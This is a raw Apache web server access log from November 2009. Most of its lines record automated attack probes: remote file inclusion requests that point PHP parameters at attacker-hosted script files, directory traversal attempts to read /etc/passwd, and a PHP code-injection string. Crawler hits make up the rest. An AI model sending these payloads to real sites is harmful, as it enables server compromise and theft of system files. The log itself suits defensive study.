116.127.121.116 - - [12/Nov/2009:04:42:04 -0600] "GET /logs/access_log.1251763200//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:04:42:54 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.221.130.17 - - [12/Nov/2009:04:42:54 -0600] "GET //appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.221.130.17 - - [12/Nov/2009:04:42:57 -0600] "GET //appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.221.130.17 - - [12/Nov/2009:04:42:57 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.221.130.17 - - [12/Nov/2009:04:43:02 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.221.130.17 - - [12/Nov/2009:04:43:02 -0600] "GET //appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
220.181.7.33 - - [12/Nov/2009:04:43:48 -0600] "GET /logs/access_log.1242777600 HTTP/1.1" 200 524288 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.55.207.119 - - [12/Nov/2009:04:45:26 -0600] "GET /logs/access_log.1169942400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.149.84.14 - - [12/Nov/2009:04:47:11 -0600] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
218.149.84.14 - - [12/Nov/2009:04:47:12 -0600] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
66.163.197.88 - - [12/Nov/2009:04:48:39 -0600] "GET //inc/content.inc.php?sIncPath=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:04:48:39 -0600] "GET /logs//inc/content.inc.php?sIncPath=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:04:48:40 -0600] "GET /logs/access_log.1247788800//inc/content.inc.php?sIncPath=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:04:48:43 -0600] "GET /logs/access_log.1252800000//inc/content.inc.php?sIncPath=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
89.149.254.73 - - [12/Nov/2009:04:48:45 -0600] "GET /logs/access_log.1237334400 HTTP/1.1" 200 196608 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.149.254.73 - - [12/Nov/2009:04:48:45 -0600] "GET /logs/access_log.1237161600 HTTP/1.1" 200 229376 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.55.207.76 - - [12/Nov/2009:04:49:25 -0600] "GET /logs/access_log.1171411200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.228 - - [12/Nov/2009:04:49:55 -0600] "GET /logs/access_log.1205452800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.137.0.63 - - [12/Nov/2009:04:50:16 -0600] "GET /popup.php?path=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 292 "-""-"
216.139.67.116 - - [12/Nov/2009:04:51:19 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 306 "-""libwww-perl/5.64"
216.139.67.116 - - [12/Nov/2009:04:51:19 -0600] "GET /logs/access_log.1238371200//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 328 "-""libwww-perl/5.64"
216.139.67.116 - - [12/Nov/2009:04:51:19 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 301 "-""libwww-perl/5.64"
65.55.207.140 - - [12/Nov/2009:04:52:54 -0600] "GET /logs/access_log.1183680000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.25.94.14 - - [12/Nov/2009:04:56:26 -0600] "GET //components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
66.163.197.88 - - [12/Nov/2009:04:57:50 -0600] "GET /logs/access_log.1243814400//inc/content.inc.php?sIncPath=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:04:57:53 -0600] "GET /logs/access_log.1237766400//inc/content.inc.php?sIncPath=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.25.94.14 - - [12/Nov/2009:04:57:54 -0600] "GET /logs/access_log.1252195200/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 375 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:04:57:54 -0600] "GET /administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:04:57:54 -0600] "GET /logs/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
66.163.197.88 - - [12/Nov/2009:04:58:23 -0600] "GET /logs/access_log.1240963200//inc/content.inc.php?sIncPath=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
77.221.130.17 - - [12/Nov/2009:05:02:30 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.221.130.17 - - [12/Nov/2009:05:02:30 -0600] "GET //appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.221.130.17 - - [12/Nov/2009:05:02:45 -0600] "GET //appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.221.130.17 - - [12/Nov/2009:05:02:45 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.221.130.17 - - [12/Nov/2009:05:02:48 -0600] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.221.130.17 - - [12/Nov/2009:05:02:48 -0600] "GET //appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
216.139.67.116 - - [12/Nov/2009:05:11:00 -0600] "GET /logs/access_log.1238371200//pollphp/textfile//admin/common.inc.php?base_path=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 349 "-""libwww-perl/5.64"
216.139.67.116 - - [12/Nov/2009:05:11:00 -0600] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 322 "-""libwww-perl/5.64"
216.139.67.116 - - [12/Nov/2009:05:11:00 -0600] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://www.atdreamholiday.com//smf/Themes/.safe??? HTTP/1.1" 404 327 "-""libwww-perl/5.64"
91.137.0.63 - - [12/Nov/2009:05:12:04 -0600] "GET /logs/popup.php?path=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 297 "-""-"
67.227.134.140 - - [12/Nov/2009:05:12:26 -0600] "GET /logs/access_log.1244937600/?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:12:26 -0600] "GET /?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:12:27 -0600] "GET /logs/?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:12:47 -0600] "GET /logs/access_log.1247184000/?sourcedir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:05:15:38 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:05:15:38 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
70.38.112.174 - - [12/Nov/2009:05:15:38 -0600] "GET /logs/access_log.1239062400//admin/spaw/spaw_control.class.php?spaw_root=http://www.flyariana.eu/ar///administrator/components/com_dbquery/classes/DBQ/admin/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
78.110.54.243 - - [12/Nov/2009:05:17:44 -0600] "GET /logs/index.php?loc=http://prety3.fileave.com/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
78.110.54.243 - - [12/Nov/2009:05:17:45 -0600] "GET /logs/access_log.1251331200/index.php?loc=http://prety3.fileave.com/fx29id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.110.54.243 - - [12/Nov/2009:05:17:45 -0600] "GET /index.php?loc=http://prety3.fileave.com/fx29id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
78.110.54.243 - - [12/Nov/2009:05:17:49 -0600] "GET /logs/access_log.1250467200/index.php?loc=http://prety3.fileave.com/fx29id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
174.142.120.148 - - [12/Nov/2009:05:19:06 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.142.120.148 - - [12/Nov/2009:05:19:06 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
174.142.120.148 - - [12/Nov/2009:05:19:06 -0600] "GET /logs/access_log.1239062400//admin/spaw/spaw_control.class.php?spaw_root=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.86.17.106 - - [12/Nov/2009:05:20:15 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.86.17.106 - - [12/Nov/2009:05:20:15 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.86.17.106 - - [12/Nov/2009:05:20:15 -0600] "GET /logs/access_log.1239062400//admin/spaw/spaw_control.class.php?spaw_root=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.86.17.106 - - [12/Nov/2009:05:20:23 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.86.17.106 - - [12/Nov/2009:05:20:23 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.86.17.106 - - [12/Nov/2009:05:20:24 -0600] "GET /logs/access_log.1239062400//admin/spaw/spaw_control.class.php?spaw_root=http://www.qqe.ru/forum/avatars/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
69.73.139.159 - - [12/Nov/2009:05:21:23 -0600] "GET /logs/myevent.php?myevent_path=http://iwebkorea.net/gajung/board//download/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.73.139.159 - - [12/Nov/2009:05:21:23 -0600] "GET /logs/access_log.1253318400/myevent.php?myevent_path=http://iwebkorea.net/gajung/board//download/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.73.139.159 - - [12/Nov/2009:05:21:23 -0600] "GET /myevent.php?myevent_path=http://iwebkorea.net/gajung/board//download/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
65.55.106.159 - - [12/Nov/2009:05:21:25 -0600] "GET /logs/access_log.1229212800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.73.139.159 - - [12/Nov/2009:05:21:37 -0600] "GET /logs/access_log.1253145600/myevent.php?myevent_path=http://iwebkorea.net/gajung/board//download/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:05:22:04 -0600] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:05:22:04 -0600] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:05:22:04 -0600] "GET /logs/access_log.1248480000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:05:22:04 -0600] "GET /logs/access_log.1244419200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.228 - - [12/Nov/2009:05:23:55 -0600] "GET /logs/access_log.1224460800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.94 - - [12/Nov/2009:05:25:08 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.99 - - [12/Nov/2009:05:25:25 -0600] "GET /logs/access_log.1211587200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.94 - - [12/Nov/2009:05:26:25 -0600] "GET /logs/access_log.1134604800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.138 - - [12/Nov/2009:05:28:54 -0600] "GET /logs/access_log.1127865600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.214.74.222 - - [12/Nov/2009:05:29:00 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:05:29:00 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:05:29:03 -0600] "GET /logs/access_log.1232236800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.58.251.130 - - [12/Nov/2009:05:31:09 -0600] "GET /logs/index.php?a=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""-"
117.58.251.130 - - [12/Nov/2009:05:31:09 -0600] "GET /index.php?a=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""-"
117.58.251.130 - - [12/Nov/2009:05:31:09 -0600] "GET /logs/index.php?a=./../../../../../../../../etc/passwd HTTP/1.1" 404 297 "-""-"
117.58.251.130 - - [12/Nov/2009:05:31:09 -0600] "GET /index.php?a=./../../../../../../../../etc/passwd HTTP/1.1" 404 292 "-""-"
190.95.231.98 - - [12/Nov/2009:05:32:53 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:05:32:53 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:05:32:53 -0600] "GET /logs/access_log.1232236800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.25.94.14 - - [12/Nov/2009:05:33:32 -0600] "GET //mail.inc.php?skin_board_path=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
157.100.230.82 - - [12/Nov/2009:05:34:03 -0600] "GET /logs/access_log.1232236800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:05:34:03 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:05:34:03 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:05:36:17 -0600] "GET /logs/access_log.1232236800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:05:36:17 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:05:36:17 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:31 -0600] "GET //config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:34 -0600] "GET //config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:05:36:36 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:05:36:36 -0600] "GET /logs/access_log.1232236800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:05:36:36 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:36 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:37 -0600] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:37 -0600] "GET /logs/access_log.1244851200//config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:39 -0600] "GET //config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:41 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:41 -0600] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:41 -0600] "GET /logs/access_log.1244851200//config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:44 -0600] "GET /logs//config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:44 -0600] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:05:36:44 -0600] "GET /logs/access_log.1244851200//config/dbutil.bck.php?confdir=http://explorecolumbusohio.com/columbus-oh-local-authors//id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:38:03 -0600] "GET //bad_link.php?theme_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:38:07 -0600] "GET /logs//bad_link.php?theme_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:38:07 -0600] "GET /logs/access_log.1253923200//bad_link.php?theme_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:38:07 -0600] "GET /logs/access_log.1250553600//bad_link.php?theme_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:38:25 -0600] "GET //bad_link.php?theme_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:38:25 -0600] "GET /logs/access_log.1253923200//bad_link.php?theme_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:38:25 -0600] "GET /logs//bad_link.php?theme_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:38:29 -0600] "GET /logs/access_log.1250553600//bad_link.php?theme_path=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [12/Nov/2009:05:40:43 -0600] "GET ///vwar/backup/errors.php?error=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [12/Nov/2009:05:40:43 -0600] "GET /logs///vwar/backup/errors.php?error=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.236.47.182 - - [12/Nov/2009:05:40:43 -0600] "GET /logs/access_log.1228608000%20%20///vwar/backup/errors.php?error=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.136 - - [12/Nov/2009:05:40:55 -0600] "GET /?D=A HTTP/1.1" 200 3245 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.47.61.97 - - [12/Nov/2009:05:41:39 -0600] "GET /logs/access_log.1250294400/become_editor.php?theme_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:05:41:39 -0600] "GET /become_editor.php?theme_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:05:41:39 -0600] "GET /logs/access_log.1251417600/become_editor.php?theme_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:05:41:39 -0600] "GET /logs/become_editor.php?theme_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
65.55.107.180 - - [12/Nov/2009:05:41:54 -0600] "GET /logs/access_log.1133395200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.47.61.97 - - [12/Nov/2009:05:47:09 -0600] "GET //bad_link.php?theme_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:05:47:10 -0600] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:05:47:10 -0600] "GET /logs/access_log.1248480000//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:05:47:10 -0600] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:05:47:10 -0600] "GET /logs/access_log.1244419200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:05:47:10 -0600] "GET /logs//bad_link.php?theme_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
61.47.61.97 - - [12/Nov/2009:05:47:10 -0600] "GET /logs/access_log.1250553600//bad_link.php?theme_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.121.181.60 - - [12/Nov/2009:05:50:21 -0600] "GET /logs/access_log.1247529600/?base_folder=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
91.121.181.60 - - [12/Nov/2009:05:50:21 -0600] "GET /?base_folder=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
91.121.181.60 - - [12/Nov/2009:05:50:23 -0600] "GET /logs/?base_folder=http://www.spotmerkezi.com/cache/fx29id.txt?? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:52:04 -0600] "GET /skin/happycast_category_lightblack/login.php?dir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:52:04 -0600] "GET /logs/access_log.1250899200/skin/happycast_category_lightblack/login.php?dir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.227.134.140 - - [12/Nov/2009:05:52:04 -0600] "GET /logs/skin/happycast_category_lightblack/login.php?dir=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
